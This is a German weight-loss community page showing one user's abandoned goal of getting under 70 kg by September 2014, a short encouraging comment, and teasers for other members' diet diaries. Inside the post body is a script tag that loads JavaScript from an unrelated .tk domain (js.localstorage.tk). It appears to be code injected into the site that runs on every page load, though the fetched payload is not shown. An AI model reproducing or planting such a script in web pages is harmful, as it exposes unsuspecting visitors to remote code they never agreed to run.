Zum Inhalt springen

Sie sind hier

U70 bis September

0  0
Ein Ziel im persönlichen Abnehmplan von , am geschrieben

Diese Woche soll durch viel Sport nochmal ein Kilo weichen Smile 

Ich will die 6 vorm Komma sehen Biggrin 

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Datum, bis zu dem das Ziel erreicht sein soll: 
01.09.2014
Ziel-Status: 
Ziel wurde aufgegeben
Abnehmen-Themen

Kommentare

Bild des Benutzers laughy
0  0

Schaffste yes

*** Das Leben ist zu kurz um aufzugeben ***

Nach oben
Zur Hauptnavigation

Persönliche Ziele im AbnehmplanWir bei der Diät-Clique halten nichts davon, Dir einen fertigen Ernährungs- oder Diätplan vorzusetzen, in dem Dir für jeden Tag vorgeschrieben wird, was Du essen sollst. Der Abnehmplan bei der Diät-Clique funktioniert anders - erfahre hier mehr zum Abnehmplan.

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Ziel für den Abnehmplan von ZielNormalgewicht: Es geht ja immer auf und ab...dennoch wiege ich mich fast täglich.  Die Schwankungen frustrieren mich weniger, als mich meine Ignoranz ärgert, wenn ich es nicht tue (wenn ich den realen Stand nicht...
Eintrag in ein Ernährungstagebuch von Solveigh: ich war ein paar Tage nicht auf der Waage. Davor hatte ich jetzt 1,5 Wochen die 102 Komma irgendwas zu sehen bekommen. Kaum hab ich mich an diese herrliche Zahl (von der Perspektive der 105 oder...
Ziel für den Abnehmplan von ZielNormalgewicht: Das Schrittprogramm will ich auch im September weiterführen. Darüber hinaus möchte ich das Fittnessstudio wieder integrieren...zusätzlich (!!) . Allerdings ist die grosse Herausforderung, das ich das...
Eintrag in ein Ernährungstagebuch von smart: Ich bin mit meiner Diät momentan fleißig am abnehmen. Allerdings mache ich nebenbei sehr viel Sport, gehe 7 mal die Woche reiten und 3-4 mal ins Fitnessstudio. Wenn ich jetzt auf die Waage steige ist...
Eintrag in ein Ernährungstagebuch von Katjusch: Aktueller Stand bei mir ist: Ich bin auf 5x die Woche Sport hoch und die Ernährung stimmt auch soweit. Mein Gewicht geht wie gewünscht langsam hoch und der KFA geht runter. Nächsten Monat habe ich...
Eintrag in ein Ernährungstagebuch von Wunschgewicht: Blöd, eigentlich war die ganze Woche zum Vergessen was das Abnehmen angeht. Nichts hat sich getan. Wenn man das Ergebnis betrachtet. Ansonsten, zum Anfang der Woche gings ordentlich rauf, jetzt bin...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst

Neue Abnehmen-Tipps